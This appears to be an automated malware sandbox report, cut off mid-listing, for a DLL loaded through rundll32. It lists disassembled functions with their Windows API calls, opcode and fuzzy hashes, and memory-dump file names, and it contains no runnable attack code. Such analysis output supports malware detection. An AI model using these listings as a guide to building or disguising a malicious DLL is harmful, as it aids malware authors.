                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 168474834-0
                                                                                                                      • Opcode ID: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                      • Instruction ID: 20fc1444fe35ab48259a21c9388e4acfe4ba196ce7874d1294122afbb026df8a
                                                                                                                      • Opcode Fuzzy Hash: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                      • Instruction Fuzzy Hash: 5111CAB6500604BBDB22DFA6CD89C6FBBEDEF897407514029FA01C6121DA31E940D728
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020F2E Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                      • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1151147025-0
                                                                                                                      • Opcode ID: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                      • Instruction ID: 9c0db37145597a9d8002a30536ddf2583a3ab63f37cab70819204e46a6a6359b
                                                                                                                      • Opcode Fuzzy Hash: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                      • Instruction Fuzzy Hash: 84F09670A40714AEF7206F718D8DF277BA4EBC6B51F01442AE611CB2D0D6B598018F50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001820B Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                      • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                      • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                      • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2841959276-0
                                                                                                                      • Opcode ID: 5a69a964b2229b4de645fa0737a3e44a531c48ca18053bc0dcb6ac84ec84f31a
                                                                                                                      • Instruction ID: 14de686d86220a01eaba4d8e7e4af7f56c4348460245bd7539e940c5f7eef93d
                                                                                                                      • Opcode Fuzzy Hash: 5a69a964b2229b4de645fa0737a3e44a531c48ca18053bc0dcb6ac84ec84f31a
                                                                                                                      • Instruction Fuzzy Hash: 99B1F075900219AFDB44CFA8C984AEE7BF4FF08344F41812AFC199B251E774EA94CB94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10029D32 Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                      • _memset.LIBCMT ref: 10029DA5
                                                                                                                        • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                        • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                        • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2905758408-0
                                                                                                                      • Opcode ID: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                      • Instruction ID: f0b41ad0b9e8c5ab018840f5e4220df87c974ebe41012567005bb994ff67d79c
                                                                                                                      • Opcode Fuzzy Hash: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                      • Instruction Fuzzy Hash: 285145B1900209DFDB50CFA4D984BDEBBF8FF08345F604529E516EB292DB74A944CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10026AC9 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3574576181-0
                                                                                                                      • Opcode ID: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                      • Instruction ID: f024da645e7c2c1b7af1d173f97c0c2408efe7f25a4d8a65d4f7a6d8da03a969
                                                                                                                      • Opcode Fuzzy Hash: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                      • Instruction Fuzzy Hash: D5414B71901229EFCB12DFA4CC45ADDBBB9FF48750F60811AF059AB151C770AA91CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                      • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                      • String ID: Software\
                                                                                                                      • API String ID: 3878845136-964853688
                                                                                                                      • Opcode ID: e4b2c3dc710f06344b799a6377126916f2dd4417048af34eff523a2566a4e52d
                                                                                                                      • Instruction ID: 3e7de1aae869807147311e9c912979647593f3c49cbedc2fe1c34f8f1305fccc
                                                                                                                      • Opcode Fuzzy Hash: e4b2c3dc710f06344b799a6377126916f2dd4417048af34eff523a2566a4e52d
                                                                                                                      • Instruction Fuzzy Hash: 2641BD35900219DBDF11DBA4CC85AEFB7F9EF49300F10052AF551E7290DB74AA84CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001AC0A Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 1001AC38
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                      • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                      • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                      • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                      • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2853195852-0
                                                                                                                      • Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                      • Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
                                                                                                                      • Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                      • Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100151F8 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3219385341-0
                                                                                                                      • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                      • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                      • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                      • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002A200 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                      • GetParent.USER32(?), ref: 1002A22C
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                      • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                      • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$LongParentVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 506644340-0
                                                                                                                      • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                      • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                      • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                      • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10032A89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                      • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                      • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                      • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                      • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                        • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                      • String ID: V&'
                                                                                                                      • API String ID: 1067611704-802299783
                                                                                                                      • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                      • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                      • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                      • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001390 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                        • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2004563703-0
                                                                                                                      • Opcode ID: bbfc80b82c06ce06fa3432dd8c84df72dbde6e28130cc3a92eea8503f98b2c83
                                                                                                                      • Instruction ID: 36031bf0d5d502a9a7c8cde16f4ed6c3aebd0fb21a6c22909054b64381bbc268
                                                                                                                      • Opcode Fuzzy Hash: bbfc80b82c06ce06fa3432dd8c84df72dbde6e28130cc3a92eea8503f98b2c83
                                                                                                                      • Instruction Fuzzy Hash: 35216DB4D04299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00C765
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017632 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreate$Open
                                                                                                                      • String ID: software
                                                                                                                      • API String ID: 1740278721-2010147023
                                                                                                                      • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                      • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                      • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                      • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001180 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                        • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                        • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                        • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                        • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task_impl$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1204490572-0
                                                                                                                      • Opcode ID: 703939aafb2aac54e1cd52b349934920119c94dd7a627e6a4c3e8e8e6c663feb
                                                                                                                      • Instruction ID: d8da987412a92661894f53f4219df58ee2caf7a71088449fd518a1fce9205d0f
                                                                                                                      • Opcode Fuzzy Hash: 703939aafb2aac54e1cd52b349934920119c94dd7a627e6a4c3e8e8e6c663feb
                                                                                                                      • Instruction Fuzzy Hash: 67214770905189DBEB09DB98C960BAEBB75EF01308F18469DE0526B3C2CB392B10C716
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020A8E Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                        • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
